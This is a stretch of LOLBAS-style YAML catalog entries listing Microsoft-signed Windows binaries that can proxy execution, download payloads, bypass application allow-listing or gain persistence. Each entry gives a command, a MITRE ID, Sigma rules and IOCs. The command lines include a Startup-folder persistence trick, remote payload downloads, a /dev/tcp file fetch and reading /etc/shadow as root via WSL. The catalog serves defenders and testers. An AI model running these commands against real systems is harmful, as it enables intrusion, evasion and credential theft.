Usecase: Execute binary Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - Execute: CMD - Command: Update.exe --createShortcut={PATH:.exe} -l=Startup Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a shortcut to the specified executable in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it. Usecase: Execute binary Category: Execute Privileges: User MitreID: T1547 OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - Execute: EXE - Command: Update.exe --removeShortcut={PATH:.exe}-l=Startup Description: Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page. Usecase: Execute binary Category: Execute Privileges: User MitreID: T1070 OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - Execute: EXE Full_Path: - Path: 'C:\Users\\AppData\Local\Microsoft\Teams\update.exe' Code_Sample: - Code: https://github.com/jreegun/POC-s/tree/master/nuget-squirrel Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml - IOC: Update.exe spawned an unknown process Resources: - Link: https://www.youtube.com/watch?v=rOP3hnkj7ls - Link: https://twitter.com/reegun21/status/1144182772623269889 - Link: https://twitter.com/MrUn1k0d3r/status/1143928885211537408 - Link: https://twitter.com/reegun21/status/1291005287034281990 - Link: http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/ - Link: https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12 - Link: 
https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56 - Link: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/ Acknowledgement: - Person: Reegun Richard Jayapaul (SpiderLabs, Trustwave) Handle: '@reegun21' - Person: Mr.Un1k0d3r Handle: '@MrUn1k0d3r' - Person: Adam Handle: '@Hexacorn' - Person: Jesus Galvez ================================================ FILE: yml/OtherMSBinaries/VSDiagnostics.yml ================================================ --- Name: VSDiagnostics.exe Description: Command-line tool used for performing diagnostics. Author: Bobby Cooke Created: 2023-07-12 Commands: - Command: VSDiagnostics.exe start 1 /launch:{PATH:.exe} Description: Starts a collection session with sessionID 1 and calls kernelbase.CreateProcessW to launch specified executable. Usecase: Proxy execution of binary Category: Execute Privileges: User MitreID: T1127 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - Command: VSDiagnostics.exe start 2 /launch:{PATH:.exe} /launchArgs:"{CMD:args}" Description: Starts a collection session with sessionID 2 and calls kernelbase.CreateProcessW to launch specified executable. Arguments specified in launchArgs are passed to CreateProcessW. 
Usecase: Proxy execution of binary with arguments Category: Execute Privileges: User MitreID: T1127 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: CMD Full_Path: - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Team Tools\DiagnosticsHub\Collector\VSDiagnostics.exe Detection: - Sigma: https://github.com/tsale/Sigma_rules/blob/d5b4a09418edfeeb3a2d654f556d5bca82003cd7/LOL_BINs/VSDiagnostics_LoLBin.yml Resources: - Link: https://twitter.com/0xBoku/status/1679200664013135872 Acknowledgement: - Person: Bobby Cooke Handle: '@0xBoku' ================================================ FILE: yml/OtherMSBinaries/VSIISExeLauncher.yml ================================================ --- Name: VSIISExeLauncher.exe Description: Binary will execute specified binary. Part of VS/VScode installation. Author: timwhite Created: 2021-09-24 Commands: - Command: VSIISExeLauncher.exe -p {PATH:.exe} -a "{CMD:args}" Description: The above binary will execute other binary. Usecase: Execute any binary with given arguments. 
Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 10 and up with VS/VScode installed Tags: - Execute: EXE Full_Path: - Path: 'C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\Web Tools\ProjectSystem\VSIISExeLauncher.exe' Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml - IOC: VSIISExeLauncher.exe spawned an unknown process Resources: - Link: https://github.com/timwhitez Acknowledgement: - Person: timwhite ================================================ FILE: yml/OtherMSBinaries/Visio.yml ================================================ --- Name: Visio.exe Description: Microsoft Visio Executable Author: Avihay Eldad Created: 2024-02-15 Commands: - Command: Visio.exe {REMOTEURL} Description: Downloads payload from remote server Usecase: It will download a remote payload and place it in INetCache. 
Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows Tags: - Download: INetCache Full_Path: - Path: C:\Program Files (x86)\Microsoft Office\Office14\Visio.exe - Path: C:\Program Files\Microsoft Office\Office14\Visio.exe - Path: C:\Program Files (x86)\Microsoft Office\Office15\Visio.exe - Path: C:\Program Files\Microsoft Office\Office15\Visio.exe - Path: C:\Program Files (x86)\Microsoft Office\Office16\Visio.exe - Path: C:\Program Files\Microsoft Office\Office16\Visio.exe - Path: C:\Program Files (x86)\Microsoft Office\root\Office14\Visio.exe - Path: C:\Program Files\Microsoft Office\root\Office14\Visio.exe - Path: C:\Program Files (x86)\Microsoft Office\root\Office15\Visio.exe - Path: C:\Program Files\Microsoft Office\root\Office15\Visio.exe - Path: C:\Program Files (x86)\Microsoft Office\root\Office16\Visio.exe - Path: C:\Program Files\Microsoft Office\root\Office16\Visio.exe Detection: - IOC: URL on a visio.exe command line - IOC: visio.exe making unexpected network connections or DNS requests Acknowledgement: - Person: Avihay Eldad Handle: '@AvihayEldad' ================================================ FILE: yml/OtherMSBinaries/VisualUiaVerifyNative.yml ================================================ --- Name: VisualUiaVerifyNative.exe Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls. Author: Jimmy (@bohops) Created: 2021-09-26 Commands: - Command: VisualUiaVerifyNative.exe Description: Generate Serialized gadget and save to - `C:\Users\%USERNAME%\AppData\Roaminguiverify.config` before executing. 
Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies Category: AWL Bypass Privileges: User MitreID: T1218 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) Tags: - Execute: .NetObjects Full_Path: - Path: c:\Program Files (x86)\Windows Kits\10\bin\\arm64\UIAVerify\VisualUiaVerifyNative.exe - Path: c:\Program Files (x86)\Windows Kits\10\bin\\x64\UIAVerify\VisualUiaVerifyNative.exe - Path: c:\Program Files (x86)\Windows Kits\10\bin\\UIAVerify\VisualUiaVerifyNative.exe Detection: - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - Sigma: https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml - IOC: As a Windows SDK binary, execution on a system may be suspicious Resources: - Link: https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/ - Link: https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad Acknowledgement: - Person: Lee Christensen Handle: '@tifkin' - Person: Jimmy Handle: '@bohops' ================================================ FILE: yml/OtherMSBinaries/VsLaunchBrowser.yml ================================================ --- Name: VSLaunchBrowser.exe Description: Microsoft Visual Studio browser launcher tool for web applications debugging Author: Avihay Eldad Created: 2024-04-12 Commands: - Command: VSLaunchBrowser.exe .exe {REMOTEURL:.exe} Description: Download and execute payload from remote server Usecase: It will download a remote file to INetCache and open it using the default app associated with the supplied file extension with VSLaunchBrowser as parent process. 
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows
    Tags:
      - Download: INetCache
  - Command: VSLaunchBrowser.exe .exe {PATH_ABSOLUTE:.exe}
    Description: Execute payload via VSLaunchBrowser as parent process
    Usecase: It will open a local file using the default app associated with the supplied file extension, with VSLaunchBrowser as the parent process.
    Category: Execute
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows
    Tags:
      - Execute: EXE
  - Command: VSLaunchBrowser.exe .exe {PATH_SMB}
    Description: Execute payload from WebDAV server via VSLaunchBrowser as parent process
    Usecase: It will open a remote file using the default app associated with the supplied file extension, with VSLaunchBrowser as the parent process.
    Category: Execute
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows
    Tags:
      - Execute: EXE
      - Execute: Remote
Full_Path:
  - Path: C:\Program Files\Microsoft Visual Studio\\Community\Common7\IDE\VSLaunchBrowser.exe
  - Path: C:\Program Files (x86)\Microsoft Visual Studio\\Community\Common7\IDE\VSLaunchBrowser.exe
Detection:
  - IOC: cmd.exe as sub-process of VSLaunchBrowser
  - IOC: URL on a VSLaunchBrowser command line
  - IOC: VSLaunchBrowser making unexpected network connections or DNS requests
Acknowledgement:
  - Person: Avihay Eldad
    Handle: '@AvihayEldad'

================================================
FILE: yml/OtherMSBinaries/Vshadow.yml
================================================
---
Name: Vshadow.exe
Description: VShadow is a command-line tool that can be used to create and manage volume shadow copies.
Author: Ayberk Halaç
Created: 2023-09-06
Commands:
  - Command: 'vshadow.exe -nw -exec={PATH_ABSOLUTE:.exe} C:'
    Description: Executes the specified executable from vshadow.exe.
    Usecase: Performs execution of the specified executable file.
    Category: Execute
    Privileges: Administrator
    MitreID: T1202
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: EXE
Full_Path:
  - Path: C:\Program Files (x86)\Windows Kits\10\bin\\x64\vshadow.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/process_creation/proc_creation_win_vshadow_exec.yml
  - IOC: vshadow.exe usage with the -exec parameter
Resources:
  - Link: https://learn.microsoft.com/en-us/windows/win32/vss/vshadow-tool-and-sample
Acknowledgement:
  - Person: Ayberk Halaç

================================================
FILE: yml/OtherMSBinaries/Vsjitdebugger.yml
================================================
---
Name: vsjitdebugger.exe
Description: Just-In-Time (JIT) debugger included with Visual Studio
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: Vsjitdebugger.exe {PATH:.exe}
    Description: Executes the specified executable as a subprocess of Vsjitdebugger.exe.
    Usecase: Execution of a local PE file as a subprocess of Vsjitdebugger.exe.
    Category: Execute
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows
    Tags:
      - Execute: EXE
Full_Path:
  - Path: c:\windows\system32\vsjitdebugger.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml
Resources:
  - Link: https://twitter.com/pabraeken/status/990758590020452353
Acknowledgement:
  - Person: Pierre-Alexandre Braeken
    Handle: '@pabraeken'

================================================
FILE: yml/OtherMSBinaries/WFMFormat.yml
================================================
---
Name: WFMFormat.exe
Description: Command-line tool used to pretty-print a dump file generated by the Message Farm Analyzer tool.
Author: Tim Baker
Created: 2024-12-05
Commands:
  - Command: WFMFormat.exe
    Description: >-
      Executes the file `tracerpt.exe` in the same folder as `WFMFormat.exe`.
      If the file `dumpfile.txt` (any content) exists in the current working directory,
      no arguments are required. Note that `WFMFormat.exe` requires .NET Framework 3.5.
    Usecase: Proxy execution of a binary
    Category: Execute
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: EXE
      - Requires: .NET Framework 3.5
Full_Path:
  - Path: C:\there\is\no\default\installation\path\WFMFormat.exe
Detection:
  - IOC: Child process from WFMFormat.exe
  - IOC: tracerpt.exe processes located anywhere other than c:\windows\system32
Resources:
  - Link: https://www.microsoft.com/en-us/download/details.aspx?id=103244
Acknowledgement:
  - Person: Tim Baker (https://www.dotsec.com)

================================================
FILE: yml/OtherMSBinaries/Wfc.yml
================================================
---
Name: Wfc.exe
Description: The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK).
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
  - Command: wfc.exe {PATH_ABSOLUTE:.xoml}
    Description: Execute arbitrary C# code embedded in an XOML file.
    Usecase: Execute a proxied payload with a Microsoft-signed binary to bypass WDAC policies
    Category: AWL Bypass
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
    Tags:
      - Execute: XOML
Full_Path:
  - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe
Code_Sample:
  - Code: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
Detection:
  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_wfc.yml
  - IOC: As a Windows SDK binary, execution on a system may be suspicious
Resources:
  - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
Acknowledgement:
  - Person: Matt Graeber
    Handle: '@mattifestation'
  - Person: Jimmy
    Handle: '@bohops'

================================================
FILE: yml/OtherMSBinaries/WinDbg.yml
================================================
---
Name: WinDbg.exe
Description: Windows Debugger for advanced user-mode and kernel-mode debugging.
Author: Avihay Eldad
Created: 2025-07-16
Commands:
  - Command: windbg.exe -g {CMD}
    Description: Launches a command line through the debugging process; optionally add `-G` to exit the debugger automatically.
    Usecase: Executes an executable under a trusted Microsoft-signed binary.
    Category: Execute
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows
    Tags:
      - Execute: CMD
Full_Path:
  - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\windbg.exe
  - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\windbg.exe
  - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\arm\windbg.exe
  - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\arm64\windbg.exe
Resources:
  - Link: https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/windbg-command-line-options
Acknowledgement:
  - Person: Avihay Eldad
    Handle: '@AvihayEldad'

================================================
FILE: yml/OtherMSBinaries/Winproj.yml
================================================
---
Name: WinProj.exe
Description: Microsoft Project executable
Author: Avihay Eldad
Created: 2024-02-14
Commands:
  - Command: WinProj.exe {REMOTEURL}
    Description: Downloads payload from remote server
    Usecase: It will download a remote payload and place it in INetCache.
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows
    Tags:
      - Download: INetCache
Full_Path:
  - Path: C:\Program Files (x86)\Microsoft Office\Office14\WinProj.exe
  - Path: C:\Program Files\Microsoft Office\Office14\WinProj.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office15\WinProj.exe
  - Path: C:\Program Files\Microsoft Office\Office15\WinProj.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office16\WinProj.exe
  - Path: C:\Program Files\Microsoft Office\Office16\WinProj.exe
  - Path: C:\Program Files (x86)\Microsoft Office\root\Office14\WinProj.exe
  - Path: C:\Program Files\Microsoft Office\root\Office14\WinProj.exe
  - Path: C:\Program Files (x86)\Microsoft Office\root\Office15\WinProj.exe
  - Path: C:\Program Files\Microsoft Office\root\Office15\WinProj.exe
  - Path: C:\Program Files (x86)\Microsoft Office\root\Office16\WinProj.exe
  - Path: C:\Program Files\Microsoft Office\root\Office16\WinProj.exe
Detection:
  - IOC: URL on a WinProj command line
  - IOC: WinProj making unexpected network connections or DNS requests
Acknowledgement:
  - Person: Avihay Eldad
    Handle: '@AvihayEldad'

================================================
FILE: yml/OtherMSBinaries/Winword.yml
================================================
---
Name: Winword.exe
Description: Microsoft Office binary
Author: 'Reegun J (OCBC Bank)'
Created: 2019-07-19
Commands:
  - Command: winword.exe {REMOTEURL}
    Description: Downloads payload from remote server
    Usecase: It will download a remote payload and place it in INetCache.
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows
    Tags:
      - Download: INetCache
Full_Path:
  - Path: C:\Program Files\Microsoft Office\root\Office16\winword.exe
  - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\winword.exe
  - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\winword.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office16\winword.exe
  - Path: C:\Program Files\Microsoft Office\Office16\winword.exe
  - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\winword.exe
  - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\winword.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office15\winword.exe
  - Path: C:\Program Files\Microsoft Office\Office15\winword.exe
  - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\winword.exe
  - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\winword.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office14\winword.exe
  - Path: C:\Program Files\Microsoft Office\Office14\winword.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office12\winword.exe
  - Path: C:\Program Files\Microsoft Office\Office12\winword.exe
  - Path: C:\Program Files\Microsoft Office\Office12\winword.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_office_arbitrary_cli_download.yml
  - IOC: Suspicious Office application Internet/network traffic
Resources:
  - Link: https://twitter.com/reegun21/status/1150032506504151040
  - Link: https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191
Acknowledgement:
  - Person: 'Reegun J (OCBC Bank)'
    Handle: '@reegun21'

================================================
FILE: yml/OtherMSBinaries/Wsl.yml
================================================
---
Name: Wsl.exe
Description: Windows Subsystem for Linux executable
Author: Matthew Brown
Created: 2019-06-27
Commands:
  - Command: wsl.exe -e /mnt/c/Windows/System32/calc.exe
    Description: Executes calc.exe from wsl.exe
    Usecase: Performs execution of the specified file; can be used to execute arbitrary Linux commands.
    Category: Execute
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows 10, Windows Server 2019, Windows 11
    Tags:
      - Execute: EXE
  - Command: wsl.exe -u root -e cat /etc/shadow
    Description: Prints the /etc/shadow file as root using cat
    Usecase: Performs execution of arbitrary Linux commands as root without needing a password.
    Category: Execute
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows 10, Windows Server 2019, Windows 11
    Tags:
      - Execute: CMD
  - Command: wsl.exe --exec bash -c "{CMD}"
    Description: Executes a Linux command (for example via bash) as the default user (unless stated otherwise using `-u `) on the default WSL distro (unless stated otherwise using `-d `)
    Usecase: Performs execution of arbitrary Linux commands.
    Category: Execute
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows 10, Windows Server 2019, Windows 11
    Tags:
      - Execute: CMD
  - Command: wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
    Description: Downloads a file from 192.168.1.10
    Usecase: Download file
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10, Windows Server 2019, Windows 11
  - Command: wsl.exe
    Description: >-
      When executed, `wsl.exe` queries the registry value of
      `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Lxss\MSI\InstallLocation`, which contains a
      folder path (`c:\program files\wsl` by default). If the value points to another folder
      containing a file named `wsl.exe`, it will be executed instead of the legitimate `wsl.exe`
      in the Program Files folder.
    Usecase: Execute a payload as a child process of `bash.exe` while masquerading as WSL.
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 10, Windows Server 2019, Windows 11
    Tags:
      - Execute: CMD
Full_Path:
  - Path: C:\Windows\System32\wsl.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wsl_lolbin_execution.yml
  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
  - IOC: Child process from wsl.exe
Resources:
  - Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
  - Link: https://twitter.com/nas_bench/status/1535431474429808642
  - Link: https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/
Acknowledgement:
  - Person: Alex Ionescu
    Handle: '@aionescu'
  - Person: Matt
    Handle: '@NotoriousRebel1'
  - Person: Asif Matadar
    Handle: '@d1r4c'
  - Person: Nasreddine Bencherchali
    Handle: '@nas_bench'
  - Person: Konrad 'unrooted' Klawikowski
  - Person: Liran Ravich, CardinalOps

================================================
FILE: yml/OtherMSBinaries/XBootMgr.yml
================================================
---
Name: XBootMgr.exe
Description: Windows Performance Toolkit binary used to start performance traces.
Author: Avihay Eldad
Created: 2025-07-10
Commands:
  - Command: xbootmgr.exe -trace "{boot|hibernate|standby|shutdown|rebootCycle}" -callBack {PATH:.exe}
    Description: Executes an executable after the trace is complete using the callBack parameter.
    Usecase: Executes code as part of a post-trace automation flow.
    Category: Execute
    Privileges: Administrator
    MitreID: T1202
    OperatingSystem: Windows
    Tags:
      - Execute: EXE
  - Command: xbootmgr.exe -trace "{boot|hibernate|standby|shutdown|rebootCycle}" -preTraceCmd {PATH:.exe}
    Description: Executes an executable before each trace run using the preTraceCmd parameter.
    Usecase: Executes code as part of pre-trace automation or staging.
    Category: Execute
    Privileges: Administrator
    MitreID: T1202
    OperatingSystem: Windows
    Tags:
      - Execute: EXE
Full_Path:
  - Path: C:\Program Files\Windows Kits\10\Windows Performance Toolkit\xbootmgr.exe
  - Path: C:\Program Files (x86)\Windows Kits\10\Windows Performance Toolkit\xbootmgr.exe
Resources:
  - Link: https://learn.microsoft.com/en-us/previous-versions/windows/desktop/xperf/reference
Acknowledgement:
  - Person: Avihay Eldad
    Handle: '@AvihayEldad'
  - Person: Tommy Warren

================================================
FILE: yml/OtherMSBinaries/XBootMgrSleep.yml
================================================
---
Name: XBootMgrSleep.exe
Description: Windows Performance Toolkit binary used for tracing and analyzing system performance during sleep and resume transitions.
Author: Avihay Eldad
Created: 2024-06-13
Commands:
  - Command: xbootmgrsleep.exe 1000 {PATH:.exe}
    Description: Executes an executable via XBootMgrSleep with a 1-second (1000 millisecond) delay. Alternatively, the delay can be replaced with any string for immediate execution.
    Usecase: Performs execution of the specified executable; can be used for defense evasion
    Category: Execute
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows
    Tags:
      - Execute: EXE
Full_Path:
  - Path: C:\Program Files\Windows Kits\10\Windows Performance Toolkit\xbootmgrsleep.exe
  - Path: C:\Program Files (x86)\Windows Kits\10\Windows Performance Toolkit\xbootmgrsleep.exe
Resources:
  - Link: https://learn.microsoft.com/en-us/previous-versions/windows/desktop/xperf/reference
Acknowledgement:
  - Person: Avihay Eldad
    Handle: '@AvihayEldad'
  - Person: Yuval Saban
    Handle: '@yuvalsaban3'

================================================
FILE: yml/OtherMSBinaries/devtunnels.yml
================================================
---
Name: devtunnel.exe
Description: Binary to enable forwarded ports on Windows operating systems.
Author: Kamran Saifullah
Created: 2023-09-16
Commands:
  - Command: devtunnel.exe host -p 8080
    Description: Enables a forwarded port so that a locally hosted service on port 8080 is exposed on the internet.
    Usecase: Download Files, Upload Files, Data Exfiltration
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10, Windows 11, MacOS
Full_Path:
  - Path: C:\Users\\AppData\Local\Temp\.net\devtunnel\devtunnel.exe
  - Path: C:\Users\\AppData\Local\Temp\DevTunnels\devtunnel.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/dns_query/dns_query_win_devtunnels_communication.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/network_connection/net_connection_win_domain_devtunnels.yml
  - IOC: devtunnel.exe binary spawned
  - IOC: '*.devtunnels.ms'
  - IOC: '*.*.devtunnels.ms'
  - Analysis: https://cydefops.com/vscode-data-exfiltration
Resources:
  - Link: https://code.visualstudio.com/docs/editor/port-forwarding
Acknowledgement:
  - Person: Kamran Saifullah
    Handle: '@deFr0ggy'

================================================
FILE: yml/OtherMSBinaries/vsls-agent.yml
================================================
---
Name: vsls-agent.exe
Description: Agent for Visual Studio Live Share (Code Collaboration)
Author: Jimmy (@bohops)
Created: 2022-11-01
Commands:
  - Command: vsls-agent.exe --agentExtensionPath {PATH_ABSOLUTE:.dll}
    Description: Load a library payload using the --agentExtensionPath parameter (32-bit)
    Usecase: Execute a proxied payload with a Microsoft-signed binary
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 10 21H2 (likely previous and newer versions with modern versions of Visual Studio installed)
    Tags:
      - Execute: DLL
Full_Path:
  - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\Extensions\Microsoft\LiveShare\Agent\vsls-agent.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_vslsagent_agentextensionpath_load.yml
Resources:
  - Link: https://twitter.com/bohops/status/1583916360404729857
Acknowledgement:
  - Person: Jimmy
    Handle: '@bohops'

================================================
FILE: yml/OtherMSBinaries/vstest.console.yml
================================================
---
Name: vstest.console.exe
Description: VSTest.Console.exe is the command-line tool for running tests
Author: Onat Uzunyayla
Created: 2023-09-08
Commands:
  - Command: vstest.console.exe {PATH:.dll}
    Description: >-
      VSTest functionality may allow an adversary to execute their malware by wrapping it in a
      test method, building it into a .exe or .dll file that is later run by vstest.console.exe.
      This may allow AWL bypass or defense evasion in general.
    Usecase: Proxy execution and AWL bypass; adversaries may run malicious code embedded inside the test methods of a crafted DLL/EXE
    Category: AWL Bypass
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: DLL
Full_Path:
  - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\TestWindow\vstest.console.exe
  - Path: C:\Program Files (x86)\Microsoft Visual Studio\2022\TestAgent\Common7\IDE\CommonExtensions\Microsoft\TestWindow\vstest.console.exe
Code_Sample:
  - Code: https://github.com/onatuzunyayla/vstest-lolbin-example/
Detection:
  - IOC: vstest.console.exe spawning unexpected processes
Resources:
  - Link: https://learn.microsoft.com/en-us/visualstudio/test/vstest-console-options?view=vs-2022
Acknowledgement:
  - Person: Onat Uzunyayla
  - Person: Ayberk Halac

================================================
FILE: yml/OtherMSBinaries/winfile.yml
================================================
---
Name: winfile.exe
Description: Windows File Manager executable
Author: Avihay Eldad
Created: 2024-04-30
Commands:
  - Command: winfile.exe {PATH:.exe}
    Description: Execute an executable file with WinFile as the parent process.
    Usecase: Performs execution of the specified file; can be used for defense evasion
    Category: Execute
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: EXE
Full_Path:
  - Path: C:\Windows\System32\winfile.exe
  - Path: C:\Windows\winfile.exe
  - Path: C:\Program Files\WinFile\winfile.exe
  - Path: C:\Program Files (x86)\WinFile\winfile.exe
  - Path: C:\Program Files\WindowsApps\Microsoft.WindowsFileManager_10.3.0.0_x64__8wekyb3d8bbwe\WinFile\winfile.exe
Resources:
  - Link: https://github.com/microsoft/winfile
Acknowledgement:
  - Person: Avihay Eldad
    Handle: '@AvihayEldad'

================================================
FILE: yml/OtherMSBinaries/xsd.yml
================================================
---
Name: xsd.exe
Description: XML Schema Definition Tool included with the Windows Software Development Kit (SDK).
Author: Avihay Eldad
Created: 2024-04-09
Commands:
  - Command: xsd.exe {REMOTEURL}
    Description: Downloads payload from remote server
    Usecase: It will download a remote payload and place it in INetCache
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows
    Tags:
      - Download: INetCache
Full_Path:
  - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\\bin\NETFX Tools\xsd.exe
Detection:
  - IOC: URL on an xsd.exe command line
  - IOC: xsd.exe making unexpected network connections or DNS requests
Acknowledgement:
  - Person: Avihay Eldad
    Handle: '@AvihayEldad'